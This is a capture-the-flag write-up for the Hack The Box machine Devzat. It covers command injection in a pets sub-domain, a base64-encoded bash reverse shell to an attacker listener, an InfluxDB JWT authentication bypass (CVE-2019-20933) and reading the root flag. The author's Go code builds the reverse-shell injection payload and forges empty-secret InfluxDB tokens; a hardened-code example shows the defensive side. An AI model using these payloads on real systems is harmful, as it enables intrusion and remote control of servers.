🔎🦶Enumeration/Foothold
Devzat is a Medium box from HTB created by cisco. You start by finding a sub-domain that is susceptible to command injection; reviewing a .git folder pulled with git-dumper confirms it. You use the command injection to get a foothold on the box as the Patrick user. On the box you find that the Devzat chat from earlier has conversations tied specifically to the Patrick user that mention InfluxDB. After pivoting to and exploiting the InfluxDB instance you are able to find the password for the final user, Catherine. As Catherine you enter the chat once again and find conversations specific to her mentioning a backup of the chat and a ‘cool feature’. You find the backup and see that the cool feature lets you read files with the /file command while in the chat, which you can use to read the root flag.
Before I begin each machine I kick off a full port scan with RustScan and pipe the open ports found into NMAP:
Once it completes I take the scan and convert it to HTML. I do this as force of habit from client engagements:
Reviewing the results I head over to Port 80, which points to http://devzat.htb/. I add it to my hosts file:
Viewing the site I see Devzat, which appears to be a chat service you connect to with an SSH client rather than a browser. A short Google later I find a GitHub repo, Quackduck – Devzat, for the app. I log in and review the app as well as the source code but see nothing useful.
devzat.htb showing an SSH messaging app.
I decide to kick off some directory/sub-domain enumeration to see if there are any additional folders or sites. I use the same ffuf command from the previous box, Shibboleth, and find a new sub-domain:
I add pets to my hosts file and navigate to the link. I try adding a pet, which works. When I delete the pet I get the error ‘Not implemented yet.’. Running this through Burp Suite I was able to test and exploit command injection and get a shell, but here is the easier approach:
Kick off a directory scan with FeroxBuster:
Results show a .git directory, which means you can use Arthaud – Git-Dumper to pull the repository:
Reviewing the extracted Git repository you can confirm inside main.go that the species parameter is concatenated into a shell command and executed without any sanitization:
By adding a ; and appending a second command I am able to use the command injection to execute arbitrary code. I opened Burp and intercepted the request. I tried using wget to pull a non-existent file from my machine as a blind check (the hit on my listener proves execution even though the response shows nothing):
After getting a response I then tried using a bash one-liner to get a reverse shell on the box. I kept running into issues, so I base64 encoded it: a bash reverse shell contains characters such as &, > and / that are easily mangled on the way through the request, whereas a base64 blob that is decoded and piped to bash on the target side survives intact:
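To make the bug and the payload concrete, here is an added Go example (my own code, not the pets app's source or the exploit from the box). It reconstructs the vulnerable pattern of concatenating user input into an sh -c command line, with echo standing in for whatever the app really runs, shows the hardened form (allowlist plus argv without a shell), and builds the base64-wrapped reverse shell value to submit in the species field. The listener address 10.10.14.5:4444 is an assumed value.

```go
package main

import (
	"encoding/base64"
	"errors"
	"fmt"
	"os/exec"
	"regexp"
)

// lookupVulnerable mirrors the bug pattern: the user-supplied species value
// is concatenated straight into a command line that a shell interprets, so a
// ';' ends the intended command and whatever follows runs as well.
// (Hypothetical reconstruction; echo stands in for the app's real command.)
func lookupVulnerable(species string) (string, error) {
	out, err := exec.Command("sh", "-c", "echo characteristics of "+species).CombinedOutput()
	return string(out), err
}

// speciesRe is an allowlist: only lowercase letters may reach the command.
var speciesRe = regexp.MustCompile(`^[a-z]+$`)

// lookupHardened rejects anything outside the allowlist and passes the value
// as a separate argv element, never through sh -c, so shell metacharacters
// have no meaning even if the allowlist were loosened later.
func lookupHardened(species string) (string, error) {
	if !speciesRe.MatchString(species) {
		return "", errors.New("invalid species")
	}
	out, err := exec.Command("echo", "characteristics of", species).CombinedOutput()
	return string(out), err
}

// injectionPayload builds the value to submit in the species field: a ';'
// terminator for the real command, then a base64 blob decoded and piped to
// bash on the target. Encoding keeps '&', '>' and '/' from being mangled in
// transit. lhost/lport are the attacker's listener (assumed values in main).
func injectionPayload(lhost string, lport int) (payload, encoded string) {
	shell := fmt.Sprintf("bash -i >& /dev/tcp/%s/%d 0>&1", lhost, lport)
	encoded = base64.StdEncoding.EncodeToString([]byte(shell))
	payload = ";echo " + encoded + "|base64 -d|bash"
	return payload, encoded
}

func main() {
	out, _ := lookupVulnerable("cat; echo INJECTED")
	fmt.Print("vulnerable: ", out)
	if _, err := lookupHardened("cat; echo INJECTED"); err != nil {
		fmt.Println("hardened:   ", err)
	}
	payload, _ := injectionPayload("10.10.14.5", 4444)
	fmt.Println("payload:", payload)
}
```

Run it and the vulnerable lookup prints INJECTED on its own line, while the hardened one rejects the same input; the printed payload is what goes into the intercepted request with a listener waiting on the assumed port.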
After receiving the response I was successfully on the box as the patrick user. I went to his home directory and grabbed his SSH key:
I copied it to my machine and logged in as Patrick:
Navigating around as Patrick I can see the user flag sits in the Catherine user’s home directory, so she is who I aim for next. I grab the latest copy of LinPEAS on my box and copy it to the victim:
🔪 Attacker Machine
🎯 Victim Machine
While LinPEAS was running I logged into an additional SSH session and logged back into the chat, this time as the Patrick user:
The chat mentions an InfluxDB but I hadn’t run into it thus far. Reviewing the LinPEAS output I can see another service running inside a Docker container on the box:
I use SSH local port forwarding to bring each port back to my box. Port 8086 gives an HTML page with 404 – Page Not Found (InfluxDB’s HTTP API has no root page; it answers on endpoints such as /ping and /query), so I use NMAP to fingerprint the service:
🔪 Attacker Machine
I Googled ‘InfluxDB http admin 1.7.5’ and it came back with a GitHub exploit result – LorenzoTullini – InfluxDB-Exploit-CVE-2019-20933, an authentication bypass in InfluxDB’s JWT handling when no shared secret has been configured. I grabbed the exploit and ran it:
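The mechanism behind that exploit, as an added Go example of my own (not the LorenzoTullini script and not InfluxDB’s code): an affected server with no shared-secret set validates bearer tokens against the empty string, so an HS256 JWT signed with "" is accepted. The forging and verifying functions below use only the standard library; the username "admin" is an assumed value (the public exploit brute-forces usernames from a wordlist), and the claim names username and exp are the ones InfluxDB 1.x reads.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"strings"
	"time"
)

// b64url is JWT's base64url-without-padding encoding.
func b64url(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// ForgeInfluxToken builds an HS256 JWT carrying the claims InfluxDB 1.x reads
// (username and exp), signed with secret. The CVE-2019-20933 bypass is that an
// affected server with no shared-secret configured validates tokens against
// the empty string, so secret == "" yields a token it accepts.
func ForgeInfluxToken(username, secret string, exp time.Time) (string, error) {
	header, err := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	if err != nil {
		return "", err
	}
	claims, err := json.Marshal(map[string]interface{}{"username": username, "exp": exp.Unix()})
	if err != nil {
		return "", err
	}
	signingInput := b64url(header) + "." + b64url(claims)
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64url(mac.Sum(nil)), nil
}

// VerifyHS256 is the server-side check written out so the bypass is visible:
// with secret "" the HMAC key is empty, and a token forged with "" verifies.
// Expired tokens are rejected, as a real verifier would.
func VerifyHS256(token, secret string) (map[string]interface{}, bool) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, false
	}
	mac := hmac.New(sha256.New, []byte(secret))
	mac.Write([]byte(parts[0] + "." + parts[1]))
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil || !hmac.Equal(sig, mac.Sum(nil)) {
		return nil, false
	}
	raw, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return nil, false
	}
	var claims map[string]interface{}
	if json.Unmarshal(raw, &claims) != nil {
		return nil, false
	}
	if e, ok := claims["exp"].(float64); !ok || time.Now().Unix() >= int64(e) {
		return nil, false
	}
	return claims, true
}

func main() {
	// "admin" is an assumed username; the public exploit brute-forces it from a wordlist.
	tok, err := ForgeInfluxToken("admin", "", time.Now().Add(time.Hour))
	if err != nil {
		panic(err)
	}
	fmt.Println("Authorization: Bearer " + tok)
	// Present it to the forwarded port, for example:
	//   curl -H "Authorization: Bearer $TOKEN" 'http://127.0.0.1:8086/query?q=SHOW+DATABASES'
}
```

The printed header is what you send to the forwarded 8086 port; a server that was patched, or that has a shared-secret configured, rejects the token because the HMAC no longer matches the empty key.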
🔝Escalation to Root
I use Catherine’s password to switch to her account and grab the user flag. As I did earlier with Patrick, I log into the chat service as Catherine to see if there is another hint. I see a conversation between her and Patrick:
They mention a ‘cool feature’, ‘password’, ‘backup’ and Port 8443. I begin looking for the backup and run LinPEAS again with extended flags in the background. I find two files in /var/backups, which LinPEAS also highlights:
I copy them both into a temporary directory and unzip them. Doing ls -la on both directories shows a difference of four files. I run a recursive diff against both directories and see something interesting:
I log into the chat on Port 8443, which has the special function. I run the /file command from the diff above and get the root flag.
As this isn’t an ‘official’ root, since I did not log in as the root user, I began running hashcat against the root user’s hash 😢.